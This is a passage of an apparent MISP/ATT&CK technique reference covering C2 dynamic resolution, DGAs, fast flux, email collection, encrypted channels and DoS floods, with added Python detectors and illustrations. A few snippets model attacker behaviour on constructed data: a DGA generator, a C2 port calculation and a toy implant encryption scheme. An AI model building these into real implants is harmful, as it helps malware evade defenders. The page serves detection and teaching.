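    # ID, flags 0x8180 (response, RD/RA set), QDCOUNT=1, ANCOUNT=1, NSCOUNT=0, ARCOUNT=0
    header = struct.pack(">HHHHHH", txn_id, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    rdata = bytes(int(o) for o in answer_ip.split("."))
    # 0xC00C is a compression pointer to the name at offset 12 (start of the question)
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def _skip_name(buf, offset):
    """Return the offset just past a (possibly compressed) DNS name."""
    while True:
        length = buf[offset]
        if length == 0:
            return offset + 1
        if (length & 0xC0) == 0xC0:  # compression pointer: two bytes, ends the name
            return offset + 2
        offset += 1 + length


def parse_a_records(response):
    """Extract (ttl, dotted_ip) for every A record in the answer section."""
    _txn, _flags, qdcount, ancount, _ns, _ar = struct.unpack(">HHHHHH", response[:12])
    offset = 12
    for _ in range(qdcount):
        offset = _skip_name(response, offset) + 4  # skip QTYPE and QCLASS
    records = []
    for _ in range(ancount):
        offset = _skip_name(response, offset)
        rtype, _rclass, ttl, rdlength = struct.unpack(">HHIH", response[offset:offset + 10])
        offset += 10
        rdata = response[offset:offset + rdlength]
        offset += rdlength
        if rtype == 1 and rdlength == 4:
            records.append((ttl, ".".join(str(b) for b in rdata)))
    return records


def derive_c2_port(ip):
    """Hypothetical port calculation from the first three octets.

    The real formula used by the referenced malware is not given on this page;
    this one exists only to show the shape of the technique.
    """
    o1, o2, o3, _o4 = (int(x) for x in ip.split("."))
    return ((o1 * 256 + o2) + o3) % 65536


if __name__ == "__main__":
    resp = build_a_response(0x1234, "update.example.test", "10.0.5.200")
    for ttl, ip in parse_a_records(resp):
        print(f"answer {ip} (ttl {ttl}) -> derived C2 port {derive_c2_port(ip)}")
```

The defensive corollary is that the resolved address is data, not a destination: a host that queries a name and then connects to a different IP or an unusual port shortly afterwards is the correlation worth alerting on, and a resolver log joined to flow records is enough to build it.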

Internal MISP references

UUID e9cc000d-174e-4e6c-9513-a0c000061700 which can be used as unique global reference for DNS Calculation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1568.003

Domain Generation Algorithms

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.[Cybereason Dissecting DGAs][Cisco Umbrella DGA][Unit 42 DGA Feb 2019]

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.[Cybereason Dissecting DGAs][Cisco Umbrella DGA][Talos CCleanup 2017][Akamai DGA Mitigation]

Adversaries may use DGAs for the purpose of Fallback Channels. When contact is lost with the primary command and control server, malware may employ a DGA as a means of reestablishing command and control.[Talos CCleanup 2017][FireEye POSHSPY April 2017][ESET Sednit 2017 Activity]

Internal MISP references

UUID b0be2e07-e4b4-4f1a-8fce-c7a1e820a817 which can be used as unique global reference for Domain Generation Algorithms in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1568.002

Fast Flux DNS

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.[MehtaFastFluxPt1][MehtaFastFluxPt2][Fast Flux - Welivesecurity]

The simplest, "single-flux" method involves registering and de-registering addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.[Fast Flux - Welivesecurity]

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.
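A single-flux domain leaves a recognisable footprint in passive DNS: many distinct A answers from unrelated networks, all with short TTLs, inside a short window. The following is an added example (not from the page) of that heuristic over a constructed resolution log; the domains, addresses, TTLs and thresholds are all made up for the illustration, and the /16 prefix is used as a cheap stand-in for the ASN lookup a real pipeline would do.

```python
from collections import defaultdict

# Constructed passive-DNS style log: (epoch_seconds, qname, answer_ip, ttl). Not a real capture.
SAMPLE_LOG = [
    (1700000000, "cdn.example.test", "203.0.113.10", 3600),
    (1700000300, "cdn.example.test", "203.0.113.10", 3600),
    (1700000600, "cdn.example.test", "203.0.113.11", 3600),
    (1700000000, "login-update.example.test", "198.51.100.7", 120),
    (1700000180, "login-update.example.test", "192.0.2.44", 150),
    (1700000360, "login-update.example.test", "198.51.100.201", 90),
    (1700000540, "login-update.example.test", "203.0.113.77", 200),
    (1700000720, "login-update.example.test", "192.0.2.9", 110),
    (1700000900, "login-update.example.test", "198.51.100.33", 180),
]


def summarize(log):
    """Per domain: distinct answer IPs, distinct /16 prefixes, highest TTL seen, observation window."""
    per_domain = defaultdict(lambda: {"ips": set(), "prefixes": set(),
                                      "max_ttl": 0, "first": None, "last": None})
    for ts, name, ip, ttl in log:
        d = per_domain[name]
        d["ips"].add(ip)
        d["prefixes"].add(".".join(ip.split(".")[:2]))  # /16 as a stand-in for ASN
        d["max_ttl"] = max(d["max_ttl"], ttl)
        d["first"] = ts if d["first"] is None else min(d["first"], ts)
        d["last"] = ts if d["last"] is None else max(d["last"], ts)
    return per_domain


def flag_fast_flux(log, min_ips=5, min_prefixes=3, max_ttl=300, window=3600):
    """Single-flux heuristic: many answers across unrelated networks, all short-lived, within one window.

    Every answer must carry a TTL at or below max_ttl (the text's five-minute lifespan),
    so a single long-lived record is enough to clear a domain.
    """
    flagged = []
    for name, d in summarize(log).items():
        span = d["last"] - d["first"]
        if (len(d["ips"]) >= min_ips and len(d["prefixes"]) >= min_prefixes
                and d["max_ttl"] <= max_ttl and span <= window):
            flagged.append(name)
    return sorted(flagged)


if __name__ == "__main__":
    print("fast-flux candidates:", flag_fast_flux(SAMPLE_LOG))
```

CDNs also rotate addresses quickly, so the prefix (or ASN) diversity test is what separates them from a botnet of compromised hosts; tune min_prefixes against your own traffic. For the double-flux case described next, run the same summary over NS answers for the zone instead of A answers for the name.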

Internal MISP references

UUID abae30c8-c6b0-46ae-b464-44b66412065f which can be used as unique global reference for Fast Flux DNS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1568.001

Dynamic Resolution

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of Fallback Channels. When contact is lost with the primary command and control server, malware may employ dynamic resolution as a means of reestablishing command and control.[Talos CCleanup 2017][FireEye POSHSPY April 2017][ESET Sednit 2017 Activity]
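The Domain Generation Algorithms entry above and this Dynamic Resolution entry describe the same mechanism: both ends run one shared algorithm instead of shipping a domain list. The block below is an added example (not code from the page or from any named malware family) of a time-seeded, letter-by-letter DGA, paired with the entropy heuristic defenders commonly use against that style. The seed, TLD, label length and the 3.5-bit threshold are assumptions chosen for the example; the two sample domains come from the DGA text on this page.

```python
import hashlib
import math

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def generate_domains(seed, day_iso, count=5, length=16, tld="ru"):
    """Time-seeded DGA: derive `count` domains from a shared secret seed and the date (YYYY-MM-DD).

    The operator runs the same function to know which names to register for that day;
    the implant runs it to know which names to try. Nothing about the names is stored.
    """
    if not 1 <= length <= 32:
        raise ValueError("length must fit in one SHA-256 digest")
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day_iso}|{i}".encode()).digest()
        # byte % 26 is slightly biased toward a..v; fine for an illustration
        label = "".join(ALPHABET[b % len(ALPHABET)] for b in digest[:length])
        domains.append(f"{label}.{tld}")
    return domains


def shannon_entropy(s):
    """Bits per character of the string's empirical character distribution."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_generated(domain, min_len=10, min_entropy=3.5):
    """Crude DGA heuristic on the second-level label: long and high-entropy."""
    parts = domain.rstrip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


if __name__ == "__main__":
    for d in generate_domains("shared-secret", "2024-01-01"):
        print(d, "suspicious" if looks_generated(d) else "passes heuristic")
```

The heuristic catches the "gibberish" style (istgmxdejdnxuyla.ru scores 3.75 bits) but not word-based DGAs such as cityjulydish.net, which the page also describes; those need a dictionary or a registration-age signal instead. Note also that the same seed produces a different set every day, which is exactly why blocking yesterday's list does nothing.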

Internal MISP references

UUID 987ad3da-9423-4fe0-a52b-b931c0b8b95f which can be used as unique global reference for Dynamic Resolution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Email Forwarding Rule

Adversaries may set up email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.[US-CERT TA18-068A 2018] Furthermore, email forwarding rules can allow adversaries to maintain persistent access to a victim's email even after compromised credentials are reset by administrators.[Pfammatter - Hidden Inbox Rules] Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or a command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.[Microsoft Tim McMichael Exchange Mail Forwarding 2][Mac Forwarding Rules]

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.[Pfammatter - Hidden Inbox Rules]

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.[Microsoft Mail Flow Rules 2023] Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.
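A periodic sweep of inbox rules is the standard control for this technique. The following is an added example (not from the page) that audits an exported set of rules for the patterns described above: forwarding or redirecting to an address outside the organization, forwarding combined with deleting or burying the original, and near-empty rule names. The records are constructed and only shaped after the property names Exchange's Get-InboxRule exposes (Name, Enabled, ForwardTo, ForwardAsAttachmentTo, RedirectTo, DeleteMessage, MoveToFolder); the mailbox addresses and the internal domain are made up.

```python
# Assumed internal domain; anything else counts as external.
INTERNAL_DOMAINS = {"corp.example"}

# Folders an attacker uses to keep forwarded originals out of the victim's sight.
HIDING_FOLDERS = {"RSS Feeds", "Deleted Items", "Junk Email", "Conversation History"}

# Constructed records. Real Get-InboxRule output formats recipients as '"Name" [SMTP:addr]';
# here they are plain addresses to keep the example short.
SAMPLE_RULES = [
    {"Mailbox": "alice@corp.example", "Name": "Vendor invoices", "Enabled": True,
     "ForwardTo": ["ap@corp.example"], "ForwardAsAttachmentTo": [], "RedirectTo": [],
     "DeleteMessage": False, "MoveToFolder": None},
    {"Mailbox": "alice@corp.example", "Name": ".", "Enabled": True,
     "ForwardTo": ["a1ice.backup@mail-example.net"], "ForwardAsAttachmentTo": [], "RedirectTo": [],
     "DeleteMessage": True, "MoveToFolder": None},
    {"Mailbox": "bob@corp.example", "Name": "Archive", "Enabled": True,
     "ForwardTo": [], "ForwardAsAttachmentTo": [], "RedirectTo": [],
     "DeleteMessage": False, "MoveToFolder": "Archive"},
    {"Mailbox": "bob@corp.example", "Name": "RSS", "Enabled": False,
     "ForwardTo": [], "ForwardAsAttachmentTo": ["x@example.org"], "RedirectTo": [],
     "DeleteMessage": False, "MoveToFolder": "RSS Feeds"},
]


def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower()


def audit_rules(rules, internal_domains=INTERNAL_DOMAINS):
    """Return (mailbox, rule name, enabled, reasons) for rules that move mail off the tenant or hide it.

    Disabled rules are reported too: an attacker can re-enable one with a single call.
    """
    findings = []
    for r in rules:
        reasons = []
        targets = r["ForwardTo"] + r["ForwardAsAttachmentTo"] + r["RedirectTo"]
        external = [t for t in targets if _domain(t) not in internal_domains]
        if external:
            reasons.append("external recipient: " + ", ".join(external))
        if targets and r["DeleteMessage"]:
            reasons.append("forwards then deletes the original")
        if targets and r["MoveToFolder"] in HIDING_FOLDERS:
            reasons.append("forwards then buries the original in " + r["MoveToFolder"])
        if len(r["Name"].strip()) <= 1:
            reasons.append("suspiciously short rule name")
        if reasons:
            findings.append((r["Mailbox"], r["Name"], r["Enabled"], reasons))
    return findings


if __name__ == "__main__":
    for mailbox, name, enabled, reasons in audit_rules(SAMPLE_RULES):
        state = "enabled" if enabled else "disabled"
        print(f"{mailbox} rule {name!r} ({state}): " + "; ".join(reasons))
```

This only sees rules the management interface returns. The MAPI-hidden rules the text mentions do not appear in Get-InboxRule output, so the sweep should be complemented with audit-log alerting on New-InboxRule and Set-InboxRule events and with a tenant-level block on automatic external forwarding.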

Internal MISP references

UUID 59db734e-9edb-4c92-b2ca-a72fe1e08ac7 which can be used as unique global reference for Email Forwarding Rule in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1114.003

Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.[Outlook File Sizes] IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.[Microsoft Outlook Files]

Internal MISP references

UUID 9a388756-9de0-45ea-9820-810443733789 which can be used as unique global reference for Local Email Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1114.001

Remote Email Collection

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as MailSniper can be used to automate searches for specific keywords.

Internal MISP references

UUID 5de59320-1471-4715-99c4-eda2f7996d07 which can be used as unique global reference for Remote Email Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1114.002

Email Collection

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

Internal MISP references

UUID 3569b783-1be5-414b-adb9-42c47ceee1cc which can be used as unique global reference for Email Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'Windows']
source MITRE

Asymmetric Cryptography

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as Asymmetric Cryptography.

Internal MISP references

UUID ce822cce-f7f1-4753-bff1-12e5bef66d53 which can be used as unique global reference for Asymmetric Cryptography in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1573.002

Symmetric Cryptography

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

Internal MISP references

UUID ac7b9775-8323-49cb-8fef-3cef972f11ac which can be used as unique global reference for Symmetric Cryptography in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1573.001

Encrypted Channel

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
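The following Python is an added example, not part of this MISP galaxy entry or of ATT&CK, and it ties together the three entries above: RC4 carries the beacon traffic (symmetric, the same key encrypts and decrypts), a textbook RSA key pair wraps a fresh per-session RC4 key (asymmetric key transport, the same pattern SSL/TLS uses), and an analyst routine shows why a key hard-coded in the sample decrypts every capture for the static-key variant but not for the hybrid one, where the sample only ever contains the operator's public key. The RSA primes, the implant configuration blob and its `KEY=` marker format, and the beacon are all constructed for illustration; the RSA is deliberately toy-sized and unpadded and must never be used for real traffic.

```python
from __future__ import annotations

import os
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream XOR. The keystream depends only on
    the key, so one call both encrypts and decrypts (symmetric cipher)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Textbook RSA with tiny constructed primes so the arithmetic stays readable.
# A real implant would embed a 2048-bit key and use OAEP padding; this toy
# only shows the shape of the key-transport step.
P, Q, E = 61, 53, 17
N = P * Q                          # modulus 3233
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (Python 3.8+ modular inverse)
OPERATOR_PUBLIC = (N, E)           # shipped inside the implant
OPERATOR_PRIVATE = (N, D)          # held only on the operator's server


def rsa_wrap(session_key: bytes, pub: tuple[int, int]) -> list[int]:
    """Encrypt each key byte as its own RSA block (toy-sized, unpadded)."""
    n, e = pub
    return [pow(b, e, n) for b in session_key]


def rsa_unwrap(blocks: list[int], priv: tuple[int, int]) -> bytes:
    n, d = priv
    return bytes(pow(c, d, n) for c in blocks)


# Variant A: one RC4 key hard-coded in the implant's (constructed) config blob.
STATIC_KEY = b"0p3r8t0rK3y!"
IMPLANT_CONFIG = b"\x00\x01C2=c2.example.test\x00KEY=" + STATIC_KEY + b"\x00"


def implant_send_static(beacon: bytes) -> bytes:
    return rc4(STATIC_KEY, beacon)


# Variant B: fresh RC4 key per session, wrapped with the operator's public key
# and sent alongside the ciphertext (the hybrid pattern SSL/TLS also uses).
def implant_send_hybrid(beacon: bytes) -> tuple[list[int], bytes]:
    session_key = os.urandom(16)
    return rsa_wrap(session_key, OPERATOR_PUBLIC), rc4(session_key, beacon)


def operator_receive_hybrid(wrapped: list[int], ciphertext: bytes) -> bytes:
    return rc4(rsa_unwrap(wrapped, OPERATOR_PRIVATE), ciphertext)


# Analyst side: material recoverable from the sample alone.
def extract_static_key(config_blob: bytes) -> bytes | None:
    """Pull the hard-coded key out of the (constructed) config format."""
    match = re.search(rb"KEY=([^\x00]+)\x00", config_blob)
    return match.group(1) if match else None


def analyst_decrypt_static(config_blob: bytes, captured: bytes) -> bytes | None:
    """Variant A falls to reverse engineering: the key in the binary decrypts
    every capture. Variant B does not; the sample holds only the public key,
    and each session key is recoverable only with the operator's private D."""
    key = extract_static_key(config_blob)
    return rc4(key, captured) if key else None


if __name__ == "__main__":
    beacon = b"id=7;host=WS01;user=alice"
    print(operator_receive_hybrid(*implant_send_hybrid(beacon)))
    print(analyst_decrypt_static(IMPLANT_CONFIG, implant_send_static(beacon)))
```

The design point is the one the Encrypted Channel entry makes: a strong algorithm does not help the adversary when the key material ships inside the sample. Per-session keys wrapped with a public key move the secret off the endpoint, which is also why network-side decryption of such traffic needs either the operator's private key or a memory capture of the session key.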

Internal MISP references

UUID 0e704680-c930-42a7-9caa-5802b8cb2c48 which can be used as unique global reference for Encrypted Channel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Application Exhaustion Flood

Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.[Arbor AnnualDoSreport Jan 2018]

Internal MISP references

UUID 49ef3482-7b75-4097-b9a6-6c9cb99d865c which can be used as unique global reference for Application Exhaustion Flood in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.003

Application or System Exploitation

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. [Sucuri BIND9 August 2015] Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.

Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as Data Destruction, Firmware Corruption, Service Stop etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.

Internal MISP references

UUID 2109de05-5b45-4519-94a2-6c04f7d88286 which can be used as unique global reference for Application or System Exploitation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.004

OS Exhaustion Flood

Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.[Arbor AnnualDoSreport Jan 2018] With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Each OS keeps a finite backlog of half-open (SYN-RECEIVED) connections per listening socket, so a sustained flood can quickly exhaust the system's ability to accept new TCP connections, preventing access to any TCP service provided by the server.[Cloudflare SynFlood] Because the source addresses of a SYN flood are usually spoofed, blocking individual senders is rarely effective; the standard host-side mitigation is SYN cookies, which let the OS avoid allocating connection state until the handshake completes.

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.[Corero SYN-ACKflood]
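As an added example (not from this entry or from ATT&CK), the Python below reads the victim-side symptom of a SYN flood the way an analyst would from `ss -tan` output: a pile of half-open sockets on one port, each claiming a different peer. The socket-table snapshot is constructed in the `ss -tan` column layout; the thresholds are illustrative and the column positions assume that default layout.

```python
from __future__ import annotations

# Constructed snapshot in the column layout of `ss -tan` on the victim host.
HEADER = "State      Recv-Q Send-Q Local Address:Port   Peer Address:Port"
LISTEN_ROWS = [
    "LISTEN     0      128    0.0.0.0:443          0.0.0.0:*",
    "LISTEN     0      128    0.0.0.0:22           0.0.0.0:*",
]
ESTAB_ROWS = [
    "ESTAB      0      0      10.0.0.5:443         198.51.100.7:51822",
    "ESTAB      0      0      10.0.0.5:22          198.51.100.9:60210",
]
# Twelve half-open connections to :443, each from a different (spoofed) peer.
SYN_RECV_ROWS = [
    f"SYN-RECV   0      0      10.0.0.5:443         203.0.113.{i}:4{i:04d}"
    for i in range(1, 13)
]
SS_SNAPSHOT = "\n".join([HEADER, *LISTEN_ROWS, *ESTAB_ROWS, *SYN_RECV_ROWS]) + "\n"


def parse_ss(text: str) -> list[tuple[str, int, str]]:
    """Return (state, local_port, peer_ip) for every socket row."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header line
        parts = line.split()
        if len(parts) < 5:
            continue
        state, local, peer = parts[0], parts[3], parts[4]
        local_port = int(local.rsplit(":", 1)[1])
        peer_ip = peer.rsplit(":", 1)[0]
        rows.append((state, local_port, peer_ip))
    return rows


def summarize_by_port(rows: list[tuple[str, int, str]]) -> dict[int, dict]:
    """Per local port: half-open vs established counts, and how many distinct
    peers the half-open sockets claim to come from."""
    summary: dict[int, dict] = {}
    for state, port, peer in rows:
        entry = summary.setdefault(port, {"SYN-RECV": 0, "ESTAB": 0, "peers": set()})
        if state in entry:
            entry[state] += 1
        if state == "SYN-RECV":
            entry["peers"].add(peer)
    return summary


def flag_syn_flood(rows, min_half_open: int = 10, min_ratio: float = 2.0) -> list[int]:
    """Ports where half-open sockets dominate: at least min_half_open of them
    and more than min_ratio times the established count. Tune both to the
    service's normal backlog; the defaults are only illustrative."""
    flagged = []
    for port, entry in summarize_by_port(rows).items():
        half_open, estab = entry["SYN-RECV"], entry["ESTAB"]
        if half_open >= min_half_open and half_open > min_ratio * max(estab, 1):
            flagged.append(port)
    return sorted(flagged)


def looks_spoofed(rows, port: int) -> bool:
    """Every half-open socket from a distinct peer is the usual signature of
    spoofed sources, which is why per-address filtering rarely helps here."""
    entry = summarize_by_port(rows).get(port)
    return bool(entry) and entry["SYN-RECV"] > 0 and len(entry["peers"]) == entry["SYN-RECV"]


if __name__ == "__main__":
    rows = parse_ss(SS_SNAPSHOT)
    print("flooded ports:", flag_syn_flood(rows))
    print("spoofed sources on 443:", looks_spoofed(rows, 443))
```

On a live host the same logic runs over `ss -tan` (or `netstat -tan`) output; on Linux the `net.ipv4.tcp_syncookies` sysctl is the mitigation the text's backlog argument points to.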

Internal MISP references

UUID b05b5092-60f8-4324-aee3-7522753439ac which can be used as unique global reference for OS Exhaustion Flood in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.001

Service Exhaustion Flood

Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.[Arbor AnnualDoSreport Jan 2018] Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.[Cloudflare HTTPflood]

Another variation, known as an SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes an SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.[Arbor SSLDoS April 2012] Current server stacks generally reject client-initiated renegotiation by default, and TLS 1.3 removed renegotiation from the protocol altogether, so this variant mainly affects older or permissively configured TLS deployments.
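The Python below is an added example, not from this entry or from ATT&CK, showing the detection side of the HTTP flood described above and of the Application Exhaustion Flood entry earlier on the page: a per-source rate check catches a single loud flooder, while a per-endpoint rate check is what still fires when many sources each stay under the per-IP threshold but all hammer the same expensive path. The access-log lines are constructed in Apache/nginx combined log format, the client addresses come from documentation ranges, and the window sizes and thresholds are illustrative.

```python
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined-log-format parser (Apache/nginx default access log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed access log: three normal clients, one loud flooder, and a
# distributed flood in which every source stays under a per-IP threshold.
_BASE = datetime(2023, 10, 10, 13, 55, 36, tzinfo=timezone.utc)


def _line(ip: str, ts: datetime, path: str) -> str:
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "GET {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'


ACCESS_LOG: list[str] = []
for n in range(1, 4):  # normal browsing: 4 requests each, spread over a minute
    for k, path in enumerate(["/", "/about", "/search?q=test", "/"]):
        ACCESS_LOG.append(_line(f"198.51.100.{n}", _BASE + timedelta(seconds=15 * k), path))
for i in range(40):    # one source, 40 hits on the expensive endpoint in ~5 s
    ACCESS_LOG.append(_line("203.0.113.9", _BASE + timedelta(milliseconds=125 * i), "/search?q=a"))
for i in range(25):    # 25 sources x 3 hits each on the same endpoint in ~8 s
    for k in range(3):
        ACCESS_LOG.append(_line(f"198.18.0.{i}", _BASE + timedelta(milliseconds=200 * i + 1500 * k), "/search?q=b"))


def parse_log(lines: list[str]) -> list[tuple[datetime, str, str]]:
    """(timestamp, source ip, path without query string) per parsable line."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        events.append((ts, m["ip"], m["path"].split("?", 1)[0]))
    return events


def max_in_window(times: list[datetime], window: timedelta) -> int:
    """Largest number of events falling inside any sliding window."""
    times = sorted(times)
    best = lo = 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
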